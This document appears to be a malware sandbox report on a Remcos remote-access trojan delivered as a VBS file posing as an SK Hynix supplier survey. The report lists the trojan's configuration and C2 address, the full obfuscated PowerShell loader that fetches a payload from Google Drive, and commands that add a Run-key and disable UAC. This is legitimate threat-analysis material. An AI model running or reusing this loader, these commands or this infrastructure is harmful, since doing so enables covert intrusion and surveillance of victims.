remcos | ce47d649ae973ea63f08e678367e58a90fdda8304e1ca930b232dcb1ea29784e

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18/11/2024, 00:08 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

[SK하이닉스 ] 2024년 하반기 협력사 예비조사표.vbs
Size

15KB
MD5

ecdc2bdc4b6797e46ba636a37e9f4dc9
SHA1

46c1326fcad9f2081169a8e204108d9987d3140b
SHA256

aa39f9573531ad0822df9283582e801e104119339b4bc9553feac79f4c9da435
SHA512

323da981a911a54bfeb56e76a0cd8899c74dbce07682f381f9ea3974b8f5c1a2a3c4563feabf67085da5317b69216e3beefad16b7cb1b357eae46f6faaf399ed
SSDEEP

384:8aEIukP7IsT0LanTOfEia9SLFrA3BY99uN7yrkC:BBTIsguTOfi9SRrIY3ubC

Score

10^/10

remcos remotehost discovery evasion execution persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

xmrhgsptl.ddns.net:47392

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-84A707
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 8 IoCs

flow	pid	Process
2	3976	WScript.exe
6	1456	powershell.exe
9	1456	powershell.exe
33	5020	msiexec.exe
37	5020	msiexec.exe
41	5020	msiexec.exe
43	5020	msiexec.exe
44	5020	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\\Software\\Frondescent48\\').servoed;%Doubtably% ($Normalstrrelsernes)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1456	powershell.exe
1144	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
6	drive.google.com
33	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
5020	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1144	powershell.exe
5020	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4872	reg.exe
4772	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1456	powershell.exe
1456	powershell.exe
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1144	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5020	msiexec.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 1456	3976	WScript.exe	84
PID 3976 wrote to memory of 1456	3976	WScript.exe	84
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 1144 wrote to memory of 5020	1144	powershell.exe	97
PID 5020 wrote to memory of 4084	5020	msiexec.exe	99
PID 5020 wrote to memory of 4084	5020	msiexec.exe	99
PID 5020 wrote to memory of 4084	5020	msiexec.exe	99
PID 4084 wrote to memory of 4872	4084	cmd.exe	101
PID 4084 wrote to memory of 4872	4084	cmd.exe	101
PID 4084 wrote to memory of 4872	4084	cmd.exe	101
PID 5020 wrote to memory of 876	5020	msiexec.exe	103
PID 5020 wrote to memory of 876	5020	msiexec.exe	103
PID 5020 wrote to memory of 876	5020	msiexec.exe	103
PID 876 wrote to memory of 4772	876	cmd.exe	105
PID 876 wrote to memory of 4772	876	cmd.exe	105
PID 876 wrote to memory of 4772	876	cmd.exe	105

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\[SK하이닉스 ] 2024년 하반기 협력사 예비조사표.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Registrerapparaters Vildtreservatets Untrue Yderbanes Tamaraus Rislendes #><#Rygskstativ Fiskeskippere Uanmodedes #>$Udvisningsordren='Forskningsledere';function Bjergvrks($Gamblerne){If ($host.DebuggerEnabled) {$Brsspekulationen=4} for ($Latinamerikaneres=$Brsspekulationen;;$Latinamerikaneres+=5){if(!$Gamblerne[$Latinamerikaneres]) { break }$Paraderer+=$Gamblerne[$Latinamerikaneres]}$Paraderer}function Leukosens($Latinamerikaneresiasa){ .($Klbemrke) ($Latinamerikaneresiasa)}$Skogbolite=Bjergvrks 'ElecnGejseBracT Veg. atcWHaemESkrmbStorCLubrL aabi SpueNonoN icat';$Regerer191=Bjergvrks ' AfvMSej o ParzJy li VarlNectl G aaTrau/';$Skriftsted124=Bjergvrks 'SuppT InflVanssSam 1B li2';$kontantprisernes=' Tu,[BussN.tcheSqu,tRefl.Ex.osv,reepuncrUnyivMblei DinCCoune un p,vadoPeruiBen,Nesc TAntim eraDukkNDentAAsphg JorETildrbr.v]fo,h:Lewd:SangsTotaEPletcRetsuEgepR PegIIg aTUnbiyRyn,PP ucr ForoPopiT AmoOSycoc RarOAvoiLToil=Svan$ TroSHistkBlovR I oI ollFHarbTElves rd.tLukrEFlj,d rd1Raa 2 ,en4';$Regerer191+=Bjergvrks 'cure5 Tor.Tils0 An. I,lu(EncoWPeleiRaj nMuskdV.dlo,istw trsUd.s QuanN ExuTMic Paro1Dis 0Oplr.Frat0Bovo;guld BerrWSagnihjrenSi k6 Ud 4 urn;Just PearxPref6Frem4henv; mme PandrP mav,ord: L s1Vare3Kuwa1U as.Okse0 C,u) H,v drG.ommeZooscRefok SjioSarg/Be o2Welk0 Lik1Grae0Hard0A ol1star0 ull1ac n FooF estiNoncr.vereKabafMilloOrdrxFo l/Mat 1Outs3Bran1 Tan.R.ce0';$Denazification=Bjergvrks 'AngluResesSubrENoncrAnbe-AnneAhirgGBymiEOxfoNGutsT';$Aureously=Bjergvrks ' Kldh R ttOmb.t Su,pMartsMeni:Spee/Pala/NikodFolkr Mo iBegrv.araeLrer.,orngRaptoVgteo T.ig acrl U geDist.Uvorc ,neoLozemAnim/CenouOvercSubd?FolkeAnomxKastp HoroTt.irN bet Rek=ElepdBes oIsolw.ursn UnglBe soj.leaMo,ndKoll&K,eriAlv dOrni=Bilm1Naut7 ArahdeciiUrceuOverlNedkZPjalx konJPl.s-Vandx tmovAgonaSmkkyShriY Te WSurpQA.kiQ omcR,ddh BajBNeurQ utcYVk,ewExostTimeGSe vcUdg.KD.bbF AutyTypev N dIT isV';$Katalepsi=Bjergvrks 'Folk>';$Klbemrke=Bjergvrks 'UndeiSatiENaphX';$Rektangelet='underholdshjlp';$Callas='\Dreamers.Lan';Leukosens (Bjergvrks 'Empr$KopiGs,ndlCa.poAfdeBTenoaNe vLMisf:,oryhBleuah stPScletHenrEWaggr UnleTr c2Jirk0 Rud6 Bu =Roma$FlacEPhosN ModvUtaa:FlasARai p,runpLangDSeraA IrrtSlotA Inc+satr$Qua CRep A .orLfourLudkoA HogS');Leukosens (Bjergvrks ' Ulm$WeargMeteLOp ro Pr bPro.ANumbLH gg: Mons Sk itilkK StnKGor E GodRPicohTaiseDisoDDigeSR,tsGIrvir iofa.eridD abeEj rnSvovsde t=Acti$KntraMedkUAadsRVolleGramO ArvuSk,bS nwlBookYV nl.EgocsUr kPR koLKmp I NebtFibr(flet$Chaok ,oraF igT UniaB reLCigaEFeltPOsmoSStnkI Top)');Leukosens (Bjergvrks $kontantprisernes);$Aureously=$Sikkerhedsgradens[0];$Popularizer=(Bjergvrks 'D bd$UnergWagoLUdplod gdbKa oASm lLResb:DextE AttkOutwSAntikTim L Dicu FlisCaliiMjeaVB,llITydeTUndrEAfs TImagEGl sNSe i=Subcn UncE ndew Ell-AdeloLuckb SpiJ TjrE PyecGipstSkep FdeSSmutY FlaSBipotPhyteSkygM Kic.Ifal$ k.rsbndekClawO R cG TilbPol OBillLStnkiF,rhT yoee');Leukosens ($Popularizer);Leukosens (Bjergvrks 'Ratt$Ope E,onfkAcros,ntukT.anlSpinuXenosP shiSacrvM thiEpittGrateModette reSqu nVari.DecoH iseStuda S.odAfhne udlrPirasDan [Jigg$ Rd DPho eT,nkn CytaI htzSp eiTalkfUndeiSeencBopla SjltBra isteeoD cenG mn]Mask=Proc$cereRE saeLissg aleDoggrBungeTu arCatt1Dela9Co c1');$Tripelalliancens=Bjergvrks 'Havg$I laEPizzk PyosAt ekAbatlUdvauJ,wpspolyiskulvOrgaiSt.wtS ore C rtRelae tan nco.BelaD MikoOprewG oun PiqlHen o E aa Pi.dPremFSasii DislFangeBars(Misq$Fo fACulduSpgerSnneeinsuoAfspuMegasvugglMiliyToxi, nt$FugiMCephaCompr EtekKalde Vibt T kpInf lPsalaRosecAutoevkst)';$Marketplace=$Haptere206;Leukosens (Bjergvrks ' dfa$TrreGMiaoljok,o atobL tkaSttylMono:.tvbpSu,cRGynaECentSMa rEMod,RReptvSupeaunmaTpolao ,arRArt.YSypi=Mi f(StavT EfreEjersHexotOct -FiskpmultARep,t yraH,dde ly e$ElevMMercAFa.mRKlimKFe.te EnftCocap PtoL ChiaAfmaC Pe E lat)');while (!$Preservatory) {Leukosens (Bjergvrks 'Patr$ Preg Skilaffao B lbE glaWanilflis:pompBVensaadopaSnigd OvosNonrm H raKip,nSnardG ves Ty pAdmiiRakebnonoeReacrQuars gte= Li $CiviBc.esrProfoRedatFesthCrayeObterB tyeSphid') ;Leukosens $Tripelalliancens;Leukosens (Bjergvrks 'PolysRepaT veraM sdrdrflt Lap-DeemspoldlaareELillE RhePPati f,rc4');Leukosens (Bjergvrks 'Aand$Tabeg ejelPuzzoLandbRaadADriflBio,:K,igpElsaRSuboE ArgsC ndEBeslrSch VPar A MantMo.poUnspR Gy.YArch=.top( hinTspawe ModsHandtF.rs-FortpPo aA spT U.oHU be D ng$ Mesm L,nA gneRSognKRaadEPhonT Un.pMonoLRetoa etocS.ukEF rd)') ;Leukosens (Bjergvrks 'Temp$Soa.GAnthl F noAfrebMosaAmrkelRepr:Oph BPlebrShotnEvaleExc l Nato ,hrkBestK,onse onrLande Bet= Una$YawpGTempL.caloBasebSankAkon lbeor:LegaS rbeuUnlinstr dSubchUndeee codDeflsPhthPKooroFrusL eptILoxitVin.iN tuSPsycKSlot+Spal+ ,ve%Demy$AutosPraeIForkKSndaKAk uEPourrLivsHAf aeHo,kdScarSZeisgBradrbimea apod Skae repNgangSUnri. IndcI,inoConnu D.snfor T') ;$Aureously=$Sikkerhedsgradens[$Brnelokkere]}$Otiant24=284090;$Bouillonen=30480;Leukosens (Bjergvrks 'Roco$E cagP ralFranoForuBKlasA ,diLC mi:StiveSpe ADvehr BlatD sshHi diAleuN P.aEVitasYeniS Pol .omb= Pre FastGMuseEQua t adb-BegrCOrohOvverndrmmTAutoE Sk.nF.ertLi.e Moms$PsycM SheaLamprDet KGadeeSemiTMe.aPBalaLNonaaflowCGuide');Leukosens (Bjergvrks 'Wors$Sulpg SinlCeliojerkbBar.aUranlpriv:pancSSisstStyleBrinnOversAfl tShivoSiber B,tmC vi Ae,=Appe Squ[Tu,mSDispyHys.s Alet KraePorkm.bdi.FremCsy soDehonLednvS eke AflrD mitgenn]Katt:Regn: Bi FDeiprKontoKemim MarBGuldaTrads asseball6Bred4M noS armt RedrFjeliNoncnDuf gunte(Anal$ IstE an aSmidrMud tKalkh SeniBaccn emte HersVitis.ire)');Leukosens (Bjergvrks 'Vari$ dlG UnclMewlo ilfBStddAextrLSe d:TentEKo,ogBlace DistS.miFUpsmOCanuRBoksbS ndRMinduJ vigSata Gobo=Depo Udpo[TrilSWhisYudposfluaT SkaEBrugMNonn. UdmtP beeBlunX KorTOpla.ErobE BabNauthCKe.lO pytdSydyiR.senLndeG ele]Send:Fejl:Em,cAUf rSAgerCbnhrISrgeiFrem.CannGFauseTussTNervsDeceT RebR Maxi H ln BurgNeur( es$MarjS nasT WooeAtteNDrbtSRetsT argo.torrCobbMScu )');Leukosens (Bjergvrks ' ud,$Ved GUndelForuoStnkBSlj AHardLBour:,ndkKFarlOPhiamContpKageoTektNOpsle ma.NGenitBechA Un,nWushaDummlBelfyAksiSStenE.ator esnUbeteAmyx=Bopl$RanueVerdg EmbeSpuftSemifFascO Itar An B onRCoinuBuf g Cys. BilsVilkU SchB obsSlettTeo r Laai ypoN etrgMat (W od$ZariOGypst RepIA paAUnatNRn,eTEn,o2Ha.n4,ont,Matr$ G,aBDudlo MinuMur IUndeLOv.rlUdr O.cytn Ca.e BenNsvej)');Leukosens $Komponentanalyserne;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Registrerapparaters Vildtreservatets Untrue Yderbanes Tamaraus Rislendes #><#Rygskstativ Fiskeskippere Uanmodedes #>$Udvisningsordren='Forskningsledere';function Bjergvrks($Gamblerne){If ($host.DebuggerEnabled) {$Brsspekulationen=4} for ($Latinamerikaneres=$Brsspekulationen;;$Latinamerikaneres+=5){if(!$Gamblerne[$Latinamerikaneres]) { break }$Paraderer+=$Gamblerne[$Latinamerikaneres]}$Paraderer}function Leukosens($Latinamerikaneresiasa){ .($Klbemrke) ($Latinamerikaneresiasa)}$Skogbolite=Bjergvrks 'ElecnGejseBracT Veg. atcWHaemESkrmbStorCLubrL aabi SpueNonoN icat';$Regerer191=Bjergvrks ' AfvMSej o ParzJy li VarlNectl G aaTrau/';$Skriftsted124=Bjergvrks 'SuppT InflVanssSam 1B li2';$kontantprisernes=' Tu,[BussN.tcheSqu,tRefl.Ex.osv,reepuncrUnyivMblei DinCCoune un p,vadoPeruiBen,Nesc TAntim eraDukkNDentAAsphg JorETildrbr.v]fo,h:Lewd:SangsTotaEPletcRetsuEgepR PegIIg aTUnbiyRyn,PP ucr ForoPopiT AmoOSycoc RarOAvoiLToil=Svan$ TroSHistkBlovR I oI ollFHarbTElves rd.tLukrEFlj,d rd1Raa 2 ,en4';$Regerer191+=Bjergvrks 'cure5 Tor.Tils0 An. I,lu(EncoWPeleiRaj nMuskdV.dlo,istw trsUd.s QuanN ExuTMic Paro1Dis 0Oplr.Frat0Bovo;guld BerrWSagnihjrenSi k6 Ud 4 urn;Just PearxPref6Frem4henv; mme PandrP mav,ord: L s1Vare3Kuwa1U as.Okse0 C,u) H,v drG.ommeZooscRefok SjioSarg/Be o2Welk0 Lik1Grae0Hard0A ol1star0 ull1ac n FooF estiNoncr.vereKabafMilloOrdrxFo l/Mat 1Outs3Bran1 Tan.R.ce0';$Denazification=Bjergvrks 'AngluResesSubrENoncrAnbe-AnneAhirgGBymiEOxfoNGutsT';$Aureously=Bjergvrks ' Kldh R ttOmb.t Su,pMartsMeni:Spee/Pala/NikodFolkr Mo iBegrv.araeLrer.,orngRaptoVgteo T.ig acrl U geDist.Uvorc ,neoLozemAnim/CenouOvercSubd?FolkeAnomxKastp HoroTt.irN bet Rek=ElepdBes oIsolw.ursn UnglBe soj.leaMo,ndKoll&K,eriAlv dOrni=Bilm1Naut7 ArahdeciiUrceuOverlNedkZPjalx konJPl.s-Vandx tmovAgonaSmkkyShriY Te WSurpQA.kiQ omcR,ddh BajBNeurQ utcYVk,ewExostTimeGSe vcUdg.KD.bbF AutyTypev N dIT isV';$Katalepsi=Bjergvrks 'Folk>';$Klbemrke=Bjergvrks 'UndeiSatiENaphX';$Rektangelet='underholdshjlp';$Callas='\Dreamers.Lan';Leukosens (Bjergvrks 'Empr$KopiGs,ndlCa.poAfdeBTenoaNe vLMisf:,oryhBleuah stPScletHenrEWaggr UnleTr c2Jirk0 Rud6 Bu =Roma$FlacEPhosN ModvUtaa:FlasARai p,runpLangDSeraA IrrtSlotA Inc+satr$Qua CRep A .orLfourLudkoA HogS');Leukosens (Bjergvrks ' Ulm$WeargMeteLOp ro Pr bPro.ANumbLH gg: Mons Sk itilkK StnKGor E GodRPicohTaiseDisoDDigeSR,tsGIrvir iofa.eridD abeEj rnSvovsde t=Acti$KntraMedkUAadsRVolleGramO ArvuSk,bS nwlBookYV nl.EgocsUr kPR koLKmp I NebtFibr(flet$Chaok ,oraF igT UniaB reLCigaEFeltPOsmoSStnkI Top)');Leukosens (Bjergvrks $kontantprisernes);$Aureously=$Sikkerhedsgradens[0];$Popularizer=(Bjergvrks 'D bd$UnergWagoLUdplod gdbKa oASm lLResb:DextE AttkOutwSAntikTim L Dicu FlisCaliiMjeaVB,llITydeTUndrEAfs TImagEGl sNSe i=Subcn UncE ndew Ell-AdeloLuckb SpiJ TjrE PyecGipstSkep FdeSSmutY FlaSBipotPhyteSkygM Kic.Ifal$ k.rsbndekClawO R cG TilbPol OBillLStnkiF,rhT yoee');Leukosens ($Popularizer);Leukosens (Bjergvrks 'Ratt$Ope E,onfkAcros,ntukT.anlSpinuXenosP shiSacrvM thiEpittGrateModette reSqu nVari.DecoH iseStuda S.odAfhne udlrPirasDan [Jigg$ Rd DPho eT,nkn CytaI htzSp eiTalkfUndeiSeencBopla SjltBra isteeoD cenG mn]Mask=Proc$cereRE saeLissg aleDoggrBungeTu arCatt1Dela9Co c1');$Tripelalliancens=Bjergvrks 'Havg$I laEPizzk PyosAt ekAbatlUdvauJ,wpspolyiskulvOrgaiSt.wtS ore C rtRelae tan nco.BelaD MikoOprewG oun PiqlHen o E aa Pi.dPremFSasii DislFangeBars(Misq$Fo fACulduSpgerSnneeinsuoAfspuMegasvugglMiliyToxi, nt$FugiMCephaCompr EtekKalde Vibt T kpInf lPsalaRosecAutoevkst)';$Marketplace=$Haptere206;Leukosens (Bjergvrks ' dfa$TrreGMiaoljok,o atobL tkaSttylMono:.tvbpSu,cRGynaECentSMa rEMod,RReptvSupeaunmaTpolao ,arRArt.YSypi=Mi f(StavT EfreEjersHexotOct -FiskpmultARep,t yraH,dde ly e$ElevMMercAFa.mRKlimKFe.te EnftCocap PtoL ChiaAfmaC Pe E lat)');while (!$Preservatory) {Leukosens (Bjergvrks 'Patr$ Preg Skilaffao B lbE glaWanilflis:pompBVensaadopaSnigd OvosNonrm H raKip,nSnardG ves Ty pAdmiiRakebnonoeReacrQuars gte= Li $CiviBc.esrProfoRedatFesthCrayeObterB tyeSphid') ;Leukosens $Tripelalliancens;Leukosens (Bjergvrks 'PolysRepaT veraM sdrdrflt Lap-DeemspoldlaareELillE RhePPati f,rc4');Leukosens (Bjergvrks 'Aand$Tabeg ejelPuzzoLandbRaadADriflBio,:K,igpElsaRSuboE ArgsC ndEBeslrSch VPar A MantMo.poUnspR Gy.YArch=.top( hinTspawe ModsHandtF.rs-FortpPo aA spT U.oHU be D ng$ Mesm L,nA gneRSognKRaadEPhonT Un.pMonoLRetoa etocS.ukEF rd)') ;Leukosens (Bjergvrks 'Temp$Soa.GAnthl F noAfrebMosaAmrkelRepr:Oph BPlebrShotnEvaleExc l Nato ,hrkBestK,onse onrLande Bet= Una$YawpGTempL.caloBasebSankAkon lbeor:LegaS rbeuUnlinstr dSubchUndeee codDeflsPhthPKooroFrusL eptILoxitVin.iN tuSPsycKSlot+Spal+ ,ve%Demy$AutosPraeIForkKSndaKAk uEPourrLivsHAf aeHo,kdScarSZeisgBradrbimea apod Skae repNgangSUnri. IndcI,inoConnu D.snfor T') ;$Aureously=$Sikkerhedsgradens[$Brnelokkere]}$Otiant24=284090;$Bouillonen=30480;Leukosens (Bjergvrks 'Roco$E cagP ralFranoForuBKlasA ,diLC mi:StiveSpe ADvehr BlatD sshHi diAleuN P.aEVitasYeniS Pol .omb= Pre FastGMuseEQua t adb-BegrCOrohOvverndrmmTAutoE Sk.nF.ertLi.e Moms$PsycM SheaLamprDet KGadeeSemiTMe.aPBalaLNonaaflowCGuide');Leukosens (Bjergvrks 'Wors$Sulpg SinlCeliojerkbBar.aUranlpriv:pancSSisstStyleBrinnOversAfl tShivoSiber B,tmC vi Ae,=Appe Squ[Tu,mSDispyHys.s Alet KraePorkm.bdi.FremCsy soDehonLednvS eke AflrD mitgenn]Katt:Regn: Bi FDeiprKontoKemim MarBGuldaTrads asseball6Bred4M noS armt RedrFjeliNoncnDuf gunte(Anal$ IstE an aSmidrMud tKalkh SeniBaccn emte HersVitis.ire)');Leukosens (Bjergvrks 'Vari$ dlG UnclMewlo ilfBStddAextrLSe d:TentEKo,ogBlace DistS.miFUpsmOCanuRBoksbS ndRMinduJ vigSata Gobo=Depo Udpo[TrilSWhisYudposfluaT SkaEBrugMNonn. UdmtP beeBlunX KorTOpla.ErobE BabNauthCKe.lO pytdSydyiR.senLndeG ele]Send:Fejl:Em,cAUf rSAgerCbnhrISrgeiFrem.CannGFauseTussTNervsDeceT RebR Maxi H ln BurgNeur( es$MarjS nasT WooeAtteNDrbtSRetsT argo.torrCobbMScu )');Leukosens (Bjergvrks ' ud,$Ved GUndelForuoStnkBSlj AHardLBour:,ndkKFarlOPhiamContpKageoTektNOpsle ma.NGenitBechA Un,nWushaDummlBelfyAksiSStenE.ator esnUbeteAmyx=Bopl$RanueVerdg EmbeSpuftSemifFascO Itar An B onRCoinuBuf g Cys. BilsVilkU SchB obsSlettTeo r Laai ypoN etrgMat (W od$ZariOGypst RepIA paAUnatNRn,eTEn,o2Ha.n4,ont,Matr$ G,aBDudlo MinuMur IUndeLOv.rlUdr O.cytn Ca.e BenNsvej)');Leukosens $Komponentanalyserne;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\Software\Frondescent48\').servoed;%Doubtably% ($Normalstrrelsernes)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Doubtably% -windowstyle 1 $Normalstrrelsernes=(gp -Path 'HKCU:\Software\Frondescent48\').servoed;%Doubtably% ($Normalstrrelsernes)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4872
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:876
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4772

Network

DNS

drive.google.com

msiexec.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

142.250.187.206
GET

https://drive.google.com/uc?export=download&id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV

powershell.exe

Remote address:

142.250.187.206:443

Request

GET /uc?export=download&id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Connection: Keep-Alive

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 18 Nov 2024 00:08:39 GMT
Location: https://drive.usercontent.google.com/download?id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-X3cWlyFn__FKW_bC5Yemug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

drive.usercontent.google.com

msiexec.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

142.250.180.1
GET

https://drive.usercontent.google.com/download?id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV&export=download

powershell.exe

Remote address:

142.250.180.1:443

Request

GET /download?id=17hiulZxJ-xvayYWQQchBQYwtGcKFyvIV&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.usercontent.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Direktoer.mdp"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
